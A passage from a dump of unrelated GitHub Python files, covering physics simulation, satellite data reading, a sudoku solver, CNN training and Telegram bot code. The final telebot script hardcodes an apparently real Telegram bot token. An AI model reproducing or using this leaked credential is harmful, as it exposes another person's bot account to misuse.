c_i(0)*T_v)\n\t\tmodel.assign_variable(theta0, c_i(0)*T_v)\n\n\t\t# boundary condition on the surface :\n\t\tself.thetaBc = DirichletBC(Q, model.theta_surface, model.surface)\n\n\t\t# Darcy flux :\n\t\tk = 0.077 * r**2 * exp(-7.8*rhob/rho_w) # intrinsic permeability\n\t\tphi = 1 - rhob/rho_i # porosity\n\t\tWmi = 0.0057 / (1 - phi) + 0.017 # irriducible water content\n\t\tSe = (Wm - Wmi) / (1 - Wmi) # effective saturation\n\t\tK = k * rho_w * g / etaw # saturated hydraulic cond.\n\t\tkrw = Se**3.0 # relative permeability\n\t\tpsi_m = p / (rho_w * g) # matric potential head\n\t\tpsi_g = z # gravitational potential head\n\t\tpsi = psi_m + psi_g # total water potential head\n\t\tu = - K * krw * psi.dx(0) # darcy water velocity\n\n\t\t# skewed test function in areas with high velocity :\n\t\tPe = (u+w)*h/(2*kb/(rhob*cb))\n\t\ttau = 1/tanh(Pe) - 1/Pe\n\t\txihat = xi + h*tau/2 * xi.dx(0)\n\n\t\t# enthalpy residual :\n\t\teta = 1.0\n\t\ttheta_mid = eta*theta + (1 - eta)*theta0\n\t\tdelta = + kb/(rhob*cb) * inner(theta_mid.dx(0), xi.dx(0)) * dx \\\n\t\t + (theta - theta0)/dt * xi * dx \\\n\t\t + (w + u) * theta_mid.dx(0) * xihat * dx \\\n\t\t - sigma * w.dx(0) / rhob * xi * dx\n\n\t\t# equation to be minimzed :\n\t\tself.J = derivative(delta, theta, dtheta) # jacobian\n\n\t\tself.delta = delta\n\t\tself.u = u\n\t\tself.Wm = Wm\n\t\tself.Wmi = Wmi\n\n\tdef get_solve_params(self):\n\t\t\"\"\"\n\t\tReturns the solve parameters.\n\t\t\"\"\"\n\t\treturn self.solve_params\n\n\tdef default_solve_params(self):\n\t\t\"\"\"\n\t\tReturns a set of default solver parameters that yield good performance\n\t\t\"\"\"\n\t\tparams = {'newton_solver' : {'relaxation_parameter' : 1.0,\n\t\t 'maximum_iterations' : 25,\n\t\t 'error_on_nonconvergence' : False,\n\t\t 'relative_tolerance' : 1e-10,\n\t\t 'absolute_tolerance' : 1e-10}}\n\t\tm_params = {'solver' : params}\n\t\treturn m_params\n\n\tdef solve(self, annotate=False):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\ts = \"::: solving FirnEnergy :::\"\n\t\tprint_text(s, cls=self)\n\n\t\tmodel = self.model\n\n\t\t# newton's iterative method :\n\t\tsolve(self.delta == 0, model.theta, self.thetaBc, J=self.J,\n\t\t solver_parameters=self.solve_params['solver'],\n\t\t annotate=annotate)\n\n\t\tmodel.assign_variable(model.W0, model.W)\n\t\tmodel.assign_variable(model.W, project(self.Wm, annotate=False))\n\n\t\tT_w = model.T_w(0)\n\t\trho_w = model.rho_w(0)\n\t\trho_i = model.rho_i(0)\n\t\tg = model.g(0)\n\t\tc_i = model.c_i(0)\n\t\tthetasp = c_i * T_w\n\t\tL_f = model.L_f(0)\n\n\t\t# update coefficients used by enthalpy :\n\t\tthetap = model.theta.vector().get_local()\n\t\tthetahigh = np.where(thetap > thetasp)[0]\n\t\tthetalow = np.where(thetap < thetasp)[0]\n\n\t\t# calculate T :\n\t\tTp = thetap / c_i\n\t\tTp[thetahigh] = T_w\n\t\tmodel.assign_variable(model.T, Tp)\n\n\t\t# calculate dW :\n\t\tWp = model.W.vector().get_local()\n\t\tWp0 = model.W0.vector().get_local()\n\t\tdW = Wp - Wp0 # water content change\n\t\tmodel.assign_variable(model.dW, dW)\n\n\t\t# adjust the snow density if water is refrozen :\n\t\trho_v = model.rho.vector().get_local()\n\t\tfreeze = dW < 0\n\t\tmelt = dW > 0\n\t\trho_v[freeze] = rho_v[freeze] - dW[freeze] * model.rho_i(0)\n\t\tmodel.assign_variable(model.rho, rho_v)\n\n\t\t## calculate W :\n\t\t#model.assign_variable(model.W0, model.W)\n\t\t#Wp = model.W.vector().get_local()\n\t\t#Wp[thetahigh] = (thetap[thetahigh] - c_i*T_w) / L_f\n\t\t#Wp[thetalow] = 0.0\n\t\t#Wp0 = model.W0.vector().get_local()\n\t\t#dW = Wp - Wp0 # water content change\n\t\t#model.assign_variable(model.W, Wp)\n\t\t#model.assign_variable(model.dW, dW)\n\n\t\tprint_min_max(model.T, 'T')\n\t\tprint_min_max(model.theta, 'theta')\n\t\tprint_min_max(model.W, 'W')\n\n\t\tp = model.vert_integrate(rho_w * g * model.W)\n\t\tphi = 1 - model.rho/rho_i # porosity\n\t\tWmi = 0.0057 / (1 - phi) + 0.017 # irr. water content\n\t\tmodel.assign_variable(model.p, p)\n\t\tmodel.assign_variable(model.u, project(self.u, annotate=False))\n\t\tmodel.assign_variable(model.Smi, project(Wmi, annotate=False))\n\t\tprint_min_max(model.p, 'p')\n\t\tprint_min_max(model.u, 'u')\n\n\n\n","repo_name":"pf4d/cslvr","sub_path":"cslvr/energy.py","file_name":"energy.py","file_ext":"py","file_size_in_byte":53890,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"25117650141","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 14 13:02:03 2022\n\n@author: pywrk\n\"\"\"\nimport sys\nimport h5py\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef applyLUT(count, lut):\n count_flt = count.flatten();\n output = np.zeros_like(count_flt, dtype=lut.dtype)\n for indx in range(count_flt.shape[0]): \n output[indx] = lut[count_flt[indx]]\n output = output.reshape(count.shape)\n return output;\n\ndef scaleDS(ds, ao, sf, fv):\n ds_flt = ds.flatten();\n output = np.zeros_like(ds_flt, dtype=sf.dtype)\n output = ds_flt*sf+ao\n output[ds_flt==fv]=-999.0\n\n output = output.reshape(ds.shape)\n return output\n \ndef dumpData(filename, out_dir):\n jobid = os.path.splitext(os.path.basename(filename))[0]\n\n out_path = out_dir + os.sep + jobid\n if not os.path.exists(out_path):\n os.mkdir(out_path)\n \n fid = h5py.File(filename, 'r')\n band_names=[\"IMG_TIR1\", \"IMG_TIR2\", \"IMG_MIR\", \"IMG_WV\", \"IMG_VIS\", \"IMG_SWIR\"]\n cal_ds_list = [\"IMG_TIR1_TEMP\", \"IMG_WV_TEMP\", \"IMG_TIR2_TEMP\", \"IMG_MIR_TEMP\", \"IMG_VIS_ALBEDO\"]\n \n for bname in band_names:\n count_ds = fid[bname][:];\n print(\"writing \" + bname)\n count_ds.tofile(out_path + os.sep + bname + \".bin\")\n for dsname in cal_ds_list:\n if dsname.startswith(bname):\n lut = fid[dsname][:]\n cal_ds = applyLUT(count_ds, lut) \n# plt.figure()\n# plt.imshow(cal_ds.squeeze())\n print(\"writing \" + dsname)\n cal_ds.tofile(out_path + os.sep + dsname +\".bin\")\n geo_ds_list=[\"Latitude\", \"Longitude\", \"Latitude_WV\", \"Longitude_WV\", \"Latitude_VIS\", \"Longitude_VIS\"]\n for dsname in geo_ds_list:\n ds = fid[dsname]\n fv = ds.attrs['_FillValue'][0]\n sf = ds.attrs['scale_factor'][0]\n ao = ds.attrs['add_offset'][0]\n scaled_ds = scaleDS(ds[:], ao, sf, fv)\n print(\"writing \" + dsname)\n scaled_ds.tofile(out_path + os.sep + dsname +\".bin\")\n \n fid.close()\n\nif __name__ == '__main__':\n if len(sys.argv) != 3:\n print(\"Usage: \" + sys.argv[0] + \"

\")\n sys.exit(-1)\n \n filename = sys.argv[1]\n out_dir = sys.argv[2]\n# filename = \"/tmp/3DIMG_13FEB2020_0700_L1B_STD.h5\"\n# out_dir = \"/tmp/\"\n dumpData(filename, out_dir)\n \n ","repo_name":"1401muskan/IMDResearch","sub_path":"read_h5.py","file_name":"read_h5.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43709378151","text":"'''\nGiven a binary tree, find its minimum depth.\nThe minimum depth is the number of nodes along the shortest path from the root node down to the nearest leaf node.\nNote: A leaf is a node with no children.\n\nExample:\nGiven binary tree [3,9,20,null,null,15,7],\n\n 3\n / \\\n 9 20\n / \\\n 15 7\nreturn its minimum depth = 2.\n'''\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n# BFS\nclass Solution:\n def minDepth(self, root: TreeNode) -> int:\n if not root:\n return 0\n depth = 1\n ans = []\n \n stack = [root]\n while stack:\n level = []\n while stack:\n node = stack.pop()\n if node:\n if not node.left and not node.right:\n ans.append(depth)\n level += node.left, node.right\n stack = level[::-1]\n depth += 1\n print(ans)\n return min(ans)\n \n#DFS\nclass Solution:\n def minDepth(self, root: 'TreeNode') -> 'int':\n if root is None:\n return 0\n \n if root.left is None:\n return self.minDepth(root.right) +1\n if root.right is None:\n return self.minDepth(root.left) +1\n \n return min(self.minDepth(root.left), self.minDepth(root.right)) +1\n","repo_name":"SuperGuy10/LeetCode_Practice","sub_path":"Python/111. Minimum Depth of Binary Tree.py","file_name":"111. Minimum Depth of Binary Tree.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71475133267","text":"import requests\nimport urllib.request\nimport os\nfrom bs4 import BeautifulSoup\nimport re\n\n\nclass Board(object):\n def __init__(self, board):\n self.board = board\n\n decided_places = [[None for _ in range(9)] for _ in range(9)]\n candidates = [[[f'{i}' for i in range(1, 10)] for _ in range(9) ] for _ in range(9)]\n cnt = 0\n for i in range(9):\n for j in range(9):\n # print(i, j, 'value = ', self.board[i][j])\n if board[i][j] != '0':\n # candidates[i][j] = None\n candidates[i][j] = '0'\n decided_places[i][j] = board[i][j]\n cnt += 1\n # print(cnt) # 何箇所埋まっているか\n self.decided_places = decided_places\n self.candidates = candidates\n self.cnt = cnt\n\n # 2次元配列を転置する関数\n def transpose(self, x: list) -> list:\n row = len(x)\n col = len(x[0])\n tmp = [[['_'] for _ in range(row) ] for _ in range(col)]\n \n for i in range(row):\n for j in range(col):\n tmp[j][i] = x[i][j]\n \n return tmp\n\n # candidateが0は、既に決定していることを表す\n def delete_candidate(self):\n for i in range(9):\n for j in range(9):\n if self.decided_places[i][j]:\n for k in range(9):\n # print(self.candidates[i][k])\n if self.decided_places[i][j] in list(self.candidates[i][k]):\n if self.candidates[i][k] != '0':\n self.candidates[i][k].remove(self.decided_places[i][j])\n if self.decided_places[i][j] in list(self.candidates[k][j]):\n if self.candidates[k][j] != '0':\n self.candidates[k][j].remove(self.decided_places[i][j])\n row_block = i // 3\n colum_block = j // 3\n for l in range(3):\n for m in range(3):\n row = row_block * 3 + l\n colum = colum_block * 3 + m\n if self.decided_places[i][j] in list(self.candidates[row][colum]):\n if self.candidates[row][colum] != '0':\n self.candidates[row][colum].remove(self.decided_places[i][j])\n\n # 各要素に対して、候補が1なら決定する。\n def check_cand(self):\n for i in range(9):\n for j in range(9):\n # print(self.candidates[i][j])\n # print('len ',len(self.candidates[i][j]))\n if (self.candidates[i][j]) and (len(self.candidates[i][j]) == 1):\n if self.candidates[i][j] != '0':\n self.decided_places[i][j] = self.candidates[i][j][0]\n # self.candidates[i][j] = None\n self.candidates[i][j] = '0'\n self.cnt += 1\n \n # print(i,j) #確定させた場所のプリント\n\n # 各列、行、ブロックがその数字をもつかチェック\n def check_cand_by_num(self):\n\n # 各数字ごとにみていく\n for NUM in range(1, 10):\n # 各列と各行について\n for i in range(9):\n r = 0\n c = 0\n if str(NUM) in self.decided_places[i]:\n r += 1\n if r == 0:\n rr = []\n for j in range(9):\n if str(NUM) in self.candidates[i][j]:\n rr.append(j)\n if len(rr) == 1:\n self.candidates[i][rr[0]] = '0'\n self.decided_places[i][rr[0]] = str(NUM)\n self.cnt += 1\n\n cand_trans = self.transpose(self.candidates)\n det_trans = self.transpose(self.decided_places)\n if str(NUM) in det_trans[i]:\n c += 1\n if c == 0:\n cc = []\n for j in range(9):\n if str(NUM) in cand_trans[i][j]:\n cc.append(j)\n if len(cc) == 1:\n self.candidates[cc[0]][i] = '0'\n self.decided_places[cc[0]][i] = str(NUM)\n self.cnt += 1\n\n # 各ブロックについて\n for i in range(3):\n for j in range(3):\n # 各ブロック内での9個をチェック\n b = 0\n bb = []\n for l in range(3):\n for m in range(3):\n x = 3 * i + l\n y = 3 * j + m\n if self.decided_places[x][y] == str(NUM):\n b += 1\n if str(NUM) in self.candidates[x][y]:\n bb.append((x, y))\n if b == 0:\n if len(bb) == 1:\n x, y = bb[0]\n self.candidates[x][y] = '0'\n self.decided_places[x][y] = str(NUM)\n self.cnt += 1\n\n\ndef scraping_all_problem():\n defo_url = \"http://numberplace.net/\" \n # BeautifulSoupオブジェクト生成\n headers = {\"User-Agent\": \"Mozilla/5.0\"}\n ## これでurllib.error.HTTPErrorを解決できるかと思ったけど、無理でした。\n # headers = {\"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0\"}\n\n\n probs = []\n # 毎日20問あるらしいので、その問題を全て取ってくる\n # b = soup.find_all(\"table\", id='qlink')\n # print(b)\n for i in range(1, 21):\n url = defo_url + f'?no={i}'\n soup = BeautifulSoup(requests.get(\n url, headers=headers).content, 'html.parser')\n a = soup.find_all(\"script\", type=\"text/javascript\")\n str_html = str(a[0]) \n # print(str_html)\n prob = re.findall(r\"var toi = '([\\d]{81})'\", str_html)\n \n # 後で扱いやすいように整形してからappend\n probs.append(cut_prob(prob[0]))\n \n return probs\n\ndef cut_prob(x: str):\n # 81桁の数字(str)を9*9に1文字ずつ分割し、\n # それぞれstrの2次元配列で保存\n tmp = []\n for i in range(9):\n tmp.append(list(x[9*i:9*i+9]))\n return tmp\n\ndef print_initial(x: list):\n for y in x:\n tmp = ['_' if y[i] == '0' else y[i] for i in range(9)]\n print(tmp)\n\nif __name__ == '__main__':\n\n all_maps = scraping_all_problem()\n for i in range(20):\n maps = all_maps[i]\n # 初期boardの確認\n print(f'===== #{i+1} =====')\n print('----- initial board -----')\n print_initial(maps)\n\n\n board = Board(maps)\n\n # 解くPART\n while(board.cnt < 81):\n board.check_cand()\n board.delete_candidate()\n board.check_cand_by_num()\n\n \"\"\" プリントしながら確認したいとき\n for y in board.candidates:\n print(y)\n\n print('------------------')\n for x in board.decided_places:\n print(x\n \"\"\"\n print(board.cnt)\n\n # 最終MAPの表示\n print('----- final board -----')\n for x in board.decided_places:\n # print(''.join(x))\n print(x)\n\n","repo_name":"kokoichi206/su-doku","sub_path":"internet.py","file_name":"internet.py","file_ext":"py","file_size_in_byte":8304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30974398837","text":"#--------try 语句 一旦发现异常 接下来的不会被执行\ntry:\n sum = 1 + '1'\n f = open('文件.txt')\n print(f.read())\n#---------------如果出错应该怎么做\nexcept OSError as reason:\n print(\"文件出错了\\n错误的原因是:\"+ str(reason))\nexcept TypeError as reason:\n print(\"类型 出错了\\n错误的原因是:\"+ str(reason))\n\n #--------finally:无论如何都会被执行的代码\n \nfinally:\n f.close()\n\n\n #---------如何自己引出一个异常\nraise \n","repo_name":"jiangfeng123/pygame","sub_path":"每日任务/2019年11月13日/tese.py","file_name":"tese.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23670459872","text":"# Tipos de Datos\nintEx = int()\nintEx = 4324\n\nfloatEx = float()\nfloatEx = 3.14\n\nbooleEx = bool()\nbooleEx = True\n\nstrEx = str()\nstrEx = 'Miau'\nstrEx = \"Guau\"\n\n# Tipos de Operadores\n\na = 5 + 6\nb = 2 - 7\nc = 654 / 342\nd = 100 // 78\ne = 3534 % 234\nf = 2**5\n\n\n#print (-a, -b)\n\n\n# Precedencia\n\nprecTest = (5 + 2 * 3) // 3\n\n# Asosiatividad\n\nasocTest = 3 // 7 % 3\n\n# Conversion de datos\n\ncastTest = 555\n\nprint(type(castTest))\n\ncastTest = str(castTest)\n\nprint(type(castTest))\n\n# Entrada de datos:\n\ninputTest = input(\"Ingresa un str\")\n\n# cualquier cosa que no sea vacio será true\ninputTest2 = bool(input(\"Ahora ingresa un bool\"))\nprint(inputTest2)\n","repo_name":"gabiacuna/Ayudantias-IWI-131-2021-1","sub_path":"C1/ayudantia02.py","file_name":"ayudantia02.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41895955003","text":"import typing as t\nimport asyncio\nimport logging\n\nfrom .event import Event\nfrom .driver import Driver\nfrom .channel import Channel\nfrom .message_envelope import MessageEnvelope\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass Connection:\n def __init__(self, identity: int, name: str, driver: Driver, metadata: t.Dict[str, str]):\n self.identity = identity\n self.name = name\n self.driver = driver\n self.metadata = metadata\n\n self._channels: t.Dict[Channel] = {}\n self._lock_channels = asyncio.Lock()\n self.driver.channel_added += self.add_channel\n self.driver.message_received += self.route_message\n\n def __repr__(self):\n return f''\n\n async def add_channel(self, channel: Channel):\n logger.info(f'Adding {channel}...')\n async with self._lock_channels:\n self._channels[channel.identity] = channel\n logger.info(f'Added {channel} to {self}')\n\n async def get_channels(self):\n logger.info('Waiting for lock to be able to get them channels')\n async with self._lock_channels:\n return list(self._channels.values())\n\n async def route_message(self, message_envelope: MessageEnvelope):\n async with self._lock_channels:\n channel = self._channels.get(message_envelope.channel_id)\n if channel is None:\n logger.error(f'Got message with unknown channel {message_envelope.channel_id}')\n return\n await channel.add_message(message_envelope.message)\n","repo_name":"eblade/attic","sub_path":"mess/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"483700763","text":"# A simple CNN classifier\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# TODO review parameters nodes of the NN \n\n\"\"\"\nDATA LOADING\n\"\"\"\n\n(train_set, train_label),(test_set, test_label) = tf.keras.datasets.cifar10.load_data()\nclass_names = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']\n\nimg_height = len(train_set[0][0])\nimg_width = len(train_set[0][0])\n\n\n\"\"\"\nFUNCTIONS \n\"\"\"\n\ndef plot_sample(images, labels):\n \"\"\"Plot utils.\"\"\"\n plt.figure(figsize=(10,10))\n for i in range(36):\n plt.subplot(6, 6, i+1)\n plt.xticks([])\n plt.yticks([])\n plt.imshow(images[i], cmap=plt.cm.binary)\n plt.xlabel(class_names[labels[i]])\n plt.show()\n\n\ndef plot_metrics(history, metric:str, title:str):\n x = range(1, len(history.history[metric])+1)\n yt = history.history[metric]\n yv = history.history['val_'+ metric]\n plt.plot(x, yt, label='Training ' + metric)\n plt.plot(x, yv, label='Validation ' + metric)\n plt.xlabel('Epoch')\n plt.ylabel(metric)\n plt.ylim([0,1])\n plt.title(title)\n plt.legend()\n plt.show()\n\n\ndef image_classifier():\n model = tf.keras.models.Sequential()\n model.add(tf.keras.layers.Rescaling(1/255., input_shape=(img_width, img_height, 3)))\n model.add(tf.keras.layers.Flatten())\n model.add(tf.keras.layers.Dense(64, activation='relu'))\n model.add(tf.keras.layers.Dense(len(class_names), activation='softmax'))\n \n return model \n\n\ndef image_cnn_classifier():\n model = tf.keras.models.Sequential()\n model.add(tf.keras.layers.Rescaling(1/255., input_shape=(img_width, img_height, 3)))\n model.add(tf.keras.layers.Conv2D(16, 3, padding='valid', activation='relu'))\n model.add(tf.keras.layers.MaxPooling2D())\n model.add(tf.keras.layers.Conv2D(32, 3, padding='valid', activation='relu'))\n model.add(tf.keras.layers.MaxPooling2D())\n model.add(tf.keras.layers.Conv2D(64, 3, padding='valid', activation='relu'))\n model.add(tf.keras.layers.MaxPooling2D())\n model.add(tf.keras.layers.Flatten())\n model.add(tf.keras.layers.Dense(64, activation='relu'))\n model.add(tf.keras.layers.Dense(len(class_names), activation='softmax'))\n\n return model\n\n\"\"\"\nMAIN \n\"\"\"\n\ndef main():\n\n # Plot a sample of images\n plot_sample(train_set, train_label.flatten())\n # Simple model \n model1 = image_classifier()\n model1.compile(optimizer='adam',loss='sparse_categorical_crossentropy', metrics=['accuracy'])\n history1 = model1.fit(train_set, train_label, validation_data=[test_set, test_label], epochs=10)\n test_loss, test_accuracy = model1.evaluate(test_set, test_label)\n print(\"Test loss:\", test_loss)\n print(\"Test accuracy:\", test_accuracy)\n\n # Loss and accuracy plots\n # plot_metrics(history1, 'loss', 'Simple classifier')\n plot_metrics(history1, 'accuracy', 'Simple classifier')\n\n # Convolutional model \n model = image_cnn_classifier()\n model.compile(optimizer='adam',loss='sparse_categorical_crossentropy', metrics=['accuracy'])\n history = model.fit(train_set, train_label, validation_data=[test_set, test_label], epochs=10)\n test_loss, test_accuracy = model.evaluate(test_set, test_label)\n print(\"Test loss:\", test_loss)\n print(\"Test accuracy:\", test_accuracy)\n\n # Loss and accuracy plots\n # plot_metrics(history, 'loss', 'CNN classifier')\n plot_metrics(history, 'accuracy', 'CNN classifier')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"francescogrienti/DeepLearning","sub_path":"Lecture7/Exercise1.py","file_name":"Exercise1.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43966894465","text":"'''\nCreated on Mar 31, 2019\n\n@author: dulan\n'''\nimport csv\nimport random\n\nfrom main.preprocess import preprocess\nfrom params import DICTIONARY, FILES\nfrom data.data_loader import data_loader\n\n\nclass data_generator(object):\n def __init__(self, ratio):\n self.ratios = ratio\n self.output_basename = 'output.csv'\n self.data_loader_obj = data_loader()\n self.dictionary = self.data_loader_obj.load_dict(FILES.DICTIONARY_FILE_PATH)\n self.pre_process_o = preprocess()\n self.convert_to_singlish()\n\n def write_to_csv(self, write_this_list):\n with open(self.output_basename, 'w') as writeFile:\n writer = csv.writer(writeFile)\n writer.writerow(write_this_list)\n writeFile.close()\n\n def get_random_word(self, list_of_words):\n length_of_list = len(list_of_words)\n if length_of_list == 1:\n return list_of_words[0]\n else:\n return list_of_words[random.randint(0, length_of_list - 1)]\n\n def convert_to_singlish(self):\n content, tags = self.data_loader_obj.load_data_from_excel(FILES.EXCEL_DATA_FILE_PATH)\n for i, line in enumerate(content):\n print(line)\n words = self.pre_process_o.pre_process(line)\n for word in words:\n if word in self.dictionary.keys():\n if not self.dictionary[word][DICTIONARY.SINGLISH_WORD] == []:\n line = line.replace(word, self.get_random_word(self.dictionary[word][DICTIONARY.SINGLISH_WORD]))\n\n print(line, tags[i])\n self.write_to_csv([line, tags[i]])\n\n","repo_name":"sashinipi/Singlish-Recism-Detection","sub_path":"data/data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42112879291","text":"import numpy\nimport h5py\nimport json\n\n\ndef convert(filename):\n\n with open(filename+\".txt\") as json_file:\n metadata = json.load(json_file)\n\n print(metadata)\n\n data = numpy.loadtxt(filename+\".dat\", skiprows=metadata[\"FILE_HEADER_LINES\"])\n\n print(data.shape)\n\n f = h5py.File(filename+'.h5', 'w')\n f1 = f.create_group(\"metadata\")\n f2 = f.create_group(\"data\")\n\n for key in metadata.keys():\n print(key, metadata[key])\n if metadata[key] is None:\n f1[key] = ''\n else:\n f1[key] = metadata[key]\n\n for i in range(data.shape[1]):\n f2[\"col%02d\"%i] = data[:,i]\n\n\n f.close()\n print(\"File written: \", filename+'.h5')\n\nif __name__ == \"__main__\":\n import os\n os.system(\"rm -f *.h5\")\n convert(\"dabam-001\")\n\n\n\n","repo_name":"srio/DabazNX","sub_path":"dabamnx/convert_dabam.py","file_name":"convert_dabam.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25849765921","text":"#coding:utf8\n\n# coding=utf-8\nimport json\nfrom flask import Blueprint, request\nfrom logger.server_logger import ServerLogger\nfrom services.lucky_draw_service import LuckyDrawService\n\n\nlucky_draw = Blueprint('lucky_draw',__name__)\n\n\n@lucky_draw.route('/api/luckydraw/prize/', methods=['Get'])\n@ServerLogger.log\ndef prize(unionid):\n prize_service = LuckyDrawService()\n response = prize_service.prize_drawing(unionid)\n return json.dumps(response)\n\n\n@lucky_draw.route('/api/luckydraw/quota/', methods=['Get'])\n@ServerLogger.log\ndef quota(unionid):\n ld_service = LuckyDrawService()\n quota = ld_service.get_number_of_remaining_draw_by_unionid(unionid)\n\n return json.dumps({'quota': quota})\n\n\n@lucky_draw.route('/api/luckydraw/prize', methods=['Get'])\n@ServerLogger.log\ndef get_lucky_draw_result():\n prize_service = LuckyDrawService()\n response = prize_service.get_lucky_draw_result()\n return json.dumps(response, ensure_ascii=False)\n\n\n@lucky_draw.route('/api/luckydraw/prize', methods=['Post'])\n@ServerLogger.log\ndef update_redeem_result():\n lucky_draw_data = json.loads(request.data.decode())\n lucky_draw_service = LuckyDrawService()\n result = lucky_draw_service.update_redeem_result(lucky_draw_data['id'])\n if result.acknowledged:\n return json.dumps({\"result\": result.acknowledged})\n else:\n return json.dumps({\"result\": result.acknowledged}), 401\n","repo_name":"chenhaoxian/snack_bar","sub_path":"server/restful/lucky_draw_router.py","file_name":"lucky_draw_router.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37962601948","text":"#File handling\n\n'''\nw --> write only\nr --> read only\nr+ --> read $ write\na --> append\n'''\n\n#Writing to a file\n\nmyList = [1,2,3]\n\nmyFile = open(\"testFile.txt\", \"w\")\n\nfor num in myList:\n myFile.write(str(num)+\"\\n\")\n\nmyFile.close()\n\n#Reading from a file\n\nmy_file = open(\"testFile.txt\", \"r\")\n\nprint(str(my_file.read()))\n\nmy_file.close()\n\nprint(\"line by line\")\n\nmy_file_line = open(\"testFile.txt\", \"r\")\nprint(str(my_file_line.readline()))\n\nmy_file_line.close()\n\n\n","repo_name":"audi4avik/Python","sub_path":"intro/file handling.py","file_name":"file handling.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29466172329","text":"from json import loads, dumps\nimport http.client as client\nfrom os import getenv\n\nBASE_DOMAIN = 'api.telegram.org'\nBASE_ENCODING = 'utf-8'\nCONTENT_TYPE_HEADER_NAME = 'Content-Type'\nCONTENT_TYPE_APPLICATION_JSON = 'application/json'\nBASE_HEADERS = {CONTENT_TYPE_HEADER_NAME: CONTENT_TYPE_APPLICATION_JSON}\n\nBOT_TOKEN = getenv(\"BOT_TOKEN\")\nBASE_URL = f\"/bot{BOT_TOKEN}\"\nSEND_MESSAGE_ENDPOINT = f\"{BASE_URL}/sendMessage\"\nSEND_POLL_ENDPOINT = f\"{BASE_URL}/sendPoll\"\n\n\ndef send_message(text: str, chat_id: int):\n body = {\n \"text\": text,\n \"chat_id\": chat_id\n }\n\n return make_rest_api_call(url=SEND_MESSAGE_ENDPOINT, method='POST', body=body)\n\n\ndef send_poll(chat_id: int, question: str, options: list, allow_multiple_answers=False, is_anonymous=False):\n body = {\n \"chat_id\" : chat_id,\n \"question\": question,\n \"options\": options,\n \"allows_multiple_answers\": allow_multiple_answers,\n \"is_anonymous\": is_anonymous\n }\n make_rest_api_call(url=SEND_POLL_ENDPOINT, method='POST', body=body)\n\n\ndef make_rest_api_call(url: str, method: str, body: dict):\n conn = client.HTTPSConnection(BASE_DOMAIN)\n json_body = dumps(body)\n bytes_body = bytes(json_body,encoding=BASE_ENCODING)\n\n conn.request(method, url, headers=BASE_HEADERS, body=bytes_body)\n response = conn.getresponse()\n raw_res = response.read()\n conn.close()\n json_res = loads(raw_res)\n\n return json_res","repo_name":"Sic4Parvis9Magna/adam-bot","sub_path":"adam/telegram_client.py","file_name":"telegram_client.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"21680957252","text":"# pip install pytelegrambotapi\n\n\nimport telebot\nfrom telebot import types\n\nbot = telebot.TeleBot('5730541647:AAE5TzJfqUeXuPQ6XGm7L5f7cy_nuZYHdwQ');\n\n\n\n\n# @bot.message_handler(commands=['Start', 'Help'])\n# def send_welcome(message):\n# bot.reply_to(message, \"Привет, приветсвую тебя в самом продвинутом телеграм канале, здесь ты как в конструкторе\"\n# \" можешь собрать все интересующие тебя уведомленияю: новости, курсы валют, и даже обновления\"\n# \" твоих рузей в Instogtram.\")\n\n# @bot.message_handler(commands=['Start', 'Help']\n# def send_welcome(message):\n# markup = types.ReplyKeyboardMarkup(row_width=2)\n# itembtn1 = types.KeyboardButton('a')\n# itembtn2 = types.KeyboardButton('v')\n# itembtn3 = types.KeyboardButton('d')\n# markup.add(itembtn1, itembtn2, itembtn3)\n# bot.send_message(chat_id, \"Choose one letter:\", reply_markup=markup)\n\n@bot.message_handler(func=lambda m: True)\ndef echo_all(message):\n\n\n markup = types.ReplyKeyboardMarkup(row_width=2)\n itembtn1 = types.KeyboardButton('Подписаться на гороскоп')\n # itembtn2 = types.KeyboardButton('v')\n # itembtn3 = types.KeyboardButton('d')\n markup.row(itembtn1)\n bot.send_message(message.from_user.id, \"Choose one letter:\", reply_markup=markup)\n\n\n\n\n\n\n# def get_text_messages(message):\n# # @bot.message_handler(content_types=['text', 'document', 'audio']) '''mabi that 